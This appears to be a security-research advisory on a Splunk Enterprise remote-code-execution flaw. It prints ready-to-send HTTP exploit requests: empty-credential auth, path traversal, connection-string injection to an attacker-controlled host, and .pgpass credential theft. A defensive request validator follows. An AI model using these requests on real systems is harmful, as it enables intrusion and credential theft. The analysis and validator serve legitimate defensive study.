Splunk Enterprise RCE (CVE-2026-20253) | ThreatLabz
Nataraja Gundale · 2026-06-27 · via Security Research | Blog

How It Works

CVE-2026-20253 involves abuse of the PostgreSQL sidecar service recovery functionality exposed through Splunk Web. An attacker can chain multiple behaviors to progress from a limited file-operation primitive to arbitrary file write and, ultimately, code execution.

Exploitation steps

1. Initial access (unauthenticated reachability via proxy): The attacker sends a crafted HTTP POST request to the Splunk Web interface (port 8000 by default). Splunk Web acts as a reverse proxy and forwards the request to the internal PostgreSQL sidecar recovery endpoint /en-US/splunkd/__raw/v1/postgres/recovery/backup. Although the sidecar listens only on 127.0.0.1:5435, this proxy path makes it reachable remotely. The recovery endpoints accept any Authorization: Basic header value, including empty credentials (Og==, which decodes to ":", a blank username and a blank password), so no valid credentials are required at any step.

The request below creates an empty /tmp/poc file to confirm the vulnerability.

POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic Og==
Content-Type: application/json
Content-Length: 47

{"database":"postgres","backupFile":"/tmp/poc"}

2. Arbitrary file creation via path traversal: The backupFile parameter is passed straight to pg_dump as its output path without validation, so the attacker can supply traversal sequences (for example ../../../../../../tmp/backuptest) to create or truncate a file at any location writable by the Splunk service account. At this stage the resulting files are typically empty, because the attacker cannot yet authenticate to the local database and pg_dump has nothing to write. The request below uses directory traversal to create a different file.

POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic Og==
Content-Type: application/json
Content-Length: 71

{"database":"postgres","backupFile":"../../../../../../tmp/backuptest"}

3. Connection string injection (dump attacker-controlled content): The database parameter is interpreted as a libpq connection string rather than a bare database name, so the attacker can inject connection parameters (for example hostaddr=attacker-db.com) and redirect Splunk to a PostgreSQL server the attacker controls instead of the local instance. (In libpq, hostaddr expects a numeric IP address while host accepts a hostname, so a working request uses whichever keyword matches the value supplied.) Because the attacker's server can be configured to accept the connection without a password, pg_dump now fetches attacker-chosen content and writes it to the specified backupFile. The request below dumps attacker-controlled database content to /tmp/poc, overwriting any existing file.

POST /en-US/splunkd/__raw/v1/postgres/recovery/backup HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic Og==
Content-Type: application/json
Content-Length: 63

{"database":"hostaddr=attacker-db.com","backupFile":"/tmp/poc"}

4. Credential theft via .pgpass reuse: Splunk stores the PostgreSQL credentials in plaintext in /opt/splunk/var/packages/data/postgres/.pgpass. Because the database parameter is parsed as a connection string, the attacker can inject a passfile parameter that points at this file; libpq then reads the password for the privileged postgres_admin user from it, and the attacker authenticates as postgres_admin without ever knowing the password. The request below does this against the restore endpoint: the Authorization header names postgres_admin with an empty password (cG9zdGdyZXNfYWRtaW46 decodes to postgres_admin:), and the password comes from the injected passfile.

POST /en-US/splunkd/__raw/v1/postgres/recovery/restore HTTP/1.1
Host: splunk.example.com:8000
Authorization: Basic cG9zdGdyZXNfYWRtaW46
Content-Type: application/json
Content-Length: 111

{"database":"dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass","backupFile":"/tmp/poc"}

5. Remote code execution (RCE): With the arbitrary file write primitive from step 3, the attacker overwrites a Python script that Splunk executes on a schedule, for example /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py. The payload runs under the Splunk service account at the next scheduled execution, giving unauthenticated remote code execution.

6. Post-exploitation impact: After gaining execution, an attacker can tamper with or delete security telemetry to degrade detection and response, harvest stored credentials/API keys from indexed data, establish persistence, disable logging mechanisms, and pivot to other internal systems using Splunk’s network position and service account privileges.
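The three input-handling failures behind steps 1 to 4 (an Authorization header that is never checked, a backupFile path that is never confined, and a database value that is treated as a libpq connection string) each have a straightforward check. The following Python is an added example written for this page, not Splunk's sidecar code and not ThreatLabz's tooling; it implements those checks as a single validator and runs it over the four request bodies shown above plus one constructed benign request. The BACKUP_ROOT directory, the benign sample's credentials and database name, and the function names are assumptions for illustration.

```python
import base64
import json
import posixpath
import re

# Assumed (hypothetical) directory the sidecar is allowed to write dumps into; the
# page does not state where legitimate backups live.
BACKUP_ROOT = "/opt/splunk/var/packages/data/postgres/backups"

# A legitimate database name is a bare identifier. Anything containing '=' or
# whitespace is a libpq connection-string fragment and must be rejected outright.
DB_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,62}$")

# libpq keywords an attacker would use to redirect the connection or steal
# credentials (host/hostaddr in step 3, passfile in step 4 of the chain).
LIBPQ_KEYS = ("host", "hostaddr", "port", "dbname", "user",
              "password", "passfile", "sslmode", "options")


def basic_header(user, password):
    """Build an HTTP Basic Authorization header value (used for the constructed sample)."""
    token = base64.b64encode(("%s:%s" % (user, password)).encode("utf-8")).decode("ascii")
    return "Basic " + token


def decode_basic_auth(header):
    """Return (user, password), or None when the header is missing, malformed, or
    carries an empty user or password (e.g. 'Og==' -> ':' or 'postgres_admin:')."""
    if not header or not header.startswith("Basic "):
        return None
    try:
        raw = base64.b64decode(header[len("Basic "):], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    if not sep or not user or not password:
        return None
    return user, password


def confine_path(candidate, root):
    """Lexically resolve candidate under root and return the result, or None if it
    is empty, absolute, or climbs out of root via '..'. Production code should also
    realpath() the result so a symlink inside root cannot escape it."""
    if not candidate:
        return None
    resolved = posixpath.normpath(posixpath.join(root, candidate))
    if resolved == root or resolved.startswith(root + "/"):
        return resolved
    return None


def check_recovery_request(auth_header, body):
    """Validate one JSON request to the backup/restore recovery endpoints.
    Returns a list of findings; an empty list means the request is acceptable."""
    findings = []
    if decode_basic_auth(auth_header) is None:
        findings.append("auth: missing or empty Basic credentials")
    try:
        params = json.loads(body)
    except json.JSONDecodeError:
        return findings + ["body: not valid JSON"]

    database = str(params.get("database", ""))
    if not DB_NAME_RE.match(database):
        injected = [k for k in LIBPQ_KEYS if re.search(r"\b%s=" % k, database)]
        if injected:
            findings.append("database: connection-string injection via " + ",".join(injected))
        else:
            findings.append("database: not a bare identifier")

    if confine_path(str(params.get("backupFile", "")), BACKUP_ROOT) is None:
        findings.append("backupFile: escapes backup root")
    return findings


# The four request bodies shown on this page, plus one constructed benign request.
SAMPLES = {
    "step1_touch":     ("Basic Og==", '{"database":"postgres","backupFile":"/tmp/poc"}'),
    "step2_traversal": ("Basic Og==", '{"database":"postgres","backupFile":"../../../../../../tmp/backuptest"}'),
    "step3_hostaddr":  ("Basic Og==", '{"database":"hostaddr=attacker-db.com","backupFile":"/tmp/poc"}'),
    "step4_passfile":  ("Basic cG9zdGdyZXNfYWRtaW46",
                        '{"database":"dbname=template1 passfile=/opt/splunk/var/packages/data/postgres/.pgpass","backupFile":"/tmp/poc"}'),
    "benign":          (basic_header("svc_backup", "s3cret"), '{"database":"splunk_app","backupFile":"nightly.dump"}'),
}


def run_samples():
    """Return {sample_name: findings} for every constructed sample."""
    return {name: check_recovery_request(auth, body) for name, (auth, body) in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in run_samples().items():
        print(name, "->", findings or ["ok"])
```

Every request from the chain fails at least two of the three checks, and the empty-password variant of Basic auth (postgres_admin:) is rejected even though a username is present. Rejecting any database value that is not a bare identifier is deliberately stricter than filtering known libpq keywords: pg_dump treats its dbname argument as a full connection string, so a deny-list of keywords would miss the next one.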

Attack chain

The figure below shows the attack chain targeting Splunk Enterprise via CVE-2026-20253.


Figure 1: Diagram depicting the attack chain targeting Splunk Enterprise via CVE-2026-20253.